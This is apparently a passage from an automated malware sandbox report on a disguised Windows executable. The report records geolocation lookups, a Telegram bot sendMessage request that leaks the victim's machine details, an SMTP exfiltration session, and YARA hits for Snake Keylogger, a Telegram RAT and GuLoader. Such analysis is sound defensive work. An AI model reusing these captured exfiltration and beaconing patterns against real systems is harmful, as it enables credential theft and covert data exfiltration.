                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.11.3049814172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:16 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:16 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:16 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 4
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlwX5zb%2BsIzr6NFTUa%2FqlKZaYJKyfy1zogIpSTSPEkzrcBAsADJGuim8UaGD4NNrJYn3zzefBwdJ2b6HlaPmzmck0DO0JlLNP3nHDPR%2F78xkaxgLhPF4UOJ5oZILDilvo%2Fn2tvv8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a27b9936fa1-IAD
                                                                                    2024-09-24 14:31:16 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.3049815172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:16 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:17 UTC676INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:17 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 5
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXTMscgwknVi12lPn4MuIXxwqPLnCI5jDBot9CaAjsZkVH5Faeu22I3QxbONzhj9RS9QFoshvjA3lnjbW0pD%2Bq849Kc1SG11M%2BNaOxnH3wdtgXPywf%2FDOIRFFptphKt%2FXPA4PCb%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a2c684581b8-IAD
                                                                                    2024-09-24 14:31:17 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.3049816172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:17 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:18 UTC668INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:18 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 6
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmWpIGrtRHA8M%2B3WiJZtsIk9hfqQgIIISSvVoOc6H92FpVcUmbWcpFZDtY9JoV0qUvHGN6uLtyvRPOSNSSscuqybIxw1MkK1EkOxSfPNjGw5qHxLbKqYJtYvEr24qtjh5D3hjUO4"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a316fdd05e5-IAD
                                                                                    2024-09-24 14:31:18 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.3049817172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:19 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:19 UTC680INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:19 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 7
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bc%2BnZuy%2FBWxOW3bLkrzT6iebi2zy%2FfnX26QsiuMFsLfN75Uysv3G6kr%2Bty%2BgX1DiGlWu24PGiXCjG3rXrbcvsm7xAe9zeGRi8Ezi00qIP0pq2O5uwKb%2BJaURbmZO3s%2BvQey0m1No"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a39dbc105e6-IAD
                                                                                    2024-09-24 14:31:19 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.3049818172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:19 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:20 UTC672INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 8
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Kj6P1rRnjoIWVhPIf1wxKVP1eCUSrjDc7ZS2XDlX0Md4AIlFQBVdKb10ukd%2Fr82%2BLyJix9HVKxBTl0ca5%2F6Bd73Nbdwhrxqchb9KIeGUs0OT0XMz36b8W862embuXlJaG8geZzp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a3e9f8bdda7-IAD
                                                                                    2024-09-24 14:31:20 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.3049819172.67.177.1344433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:20 UTC62OUTGET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:20 UTC670INHTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 8
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uBkdfA0X8Gk3j7lraD2r1wwj0wpdPQBluTi9RlkF1OsEJT2X9OcTQ5x8G%2FbyXEtXhvdwql3lOz8g7WvosmeT6EXm1kAOdxwGeh4uIouy36HgeWJATZEfz9HEOO%2FcHIRkM8NwSJx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a435911c95a-IAD
                                                                                    2024-09-24 14:31:20 UTC335INData Raw: 31 34 38 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 5a 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 43 7a 65 63 68 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 50 72 61 67 75 65 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 35 30 2e 30 38 34 38 3c 2f 4c 61
                                                                                    Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.11.3049820149.154.167.2204433392C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-24 14:31:21 UTC341OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                    Host: api.telegram.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-09-24 14:31:22 UTC344INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Tue, 24 Sep 2024 14:31:22 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 55
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2024-09-24 14:31:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                    SMTP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    Sep 24, 2024 16:31:29.174940109 CEST58749821185.230.214.164192.168.11.30220 mx.zoho.eu SMTP Server ready September 24, 2024 4:31:29 PM CEST
                                                                                    Sep 24, 2024 16:31:29.175318956 CEST49821587192.168.11.30185.230.214.164EHLO 888683
                                                                                    Sep 24, 2024 16:31:29.631243944 CEST58749821185.230.214.164192.168.11.30250-mx.zoho.eu Hello 888683 (79.127.132.20 (79.127.132.20))
                                                                                    Sep 24, 2024 16:31:29.631299019 CEST58749821185.230.214.164192.168.11.30250-STARTTLS
                                                                                    Sep 24, 2024 16:31:29.631337881 CEST58749821185.230.214.164192.168.11.30250 SIZE 53477376
                                                                                    Sep 24, 2024 16:31:29.631556034 CEST49821587192.168.11.30185.230.214.164STARTTLS
                                                                                    Sep 24, 2024 16:31:29.821167946 CEST58749821185.230.214.164192.168.11.30220 Ready to start TLS.

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:10:29:41
                                                                                    Start date:24/09/2024
                                                                                    Path:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:634'320 bytes
                                                                                    MD5 hash:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.17886564519.0000000008520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:10:30:52
                                                                                    Start date:24/09/2024
                                                                                    Path:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:634'320 bytes
                                                                                    MD5 hash:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.17878640110.0000000004729000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22144177112.0000000035965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.22140550905.0000000034921000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22140550905.00000000349E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22139401502.000000003446F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.22149922122.0000000036A20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:24.4%
                                                                                      Dynamic/Decrypted Code Coverage:17.1%
                                                                                      Signature Coverage:16.9%
                                                                                      Total number of Nodes:1358
                                                                                      Total number of Limit Nodes:53
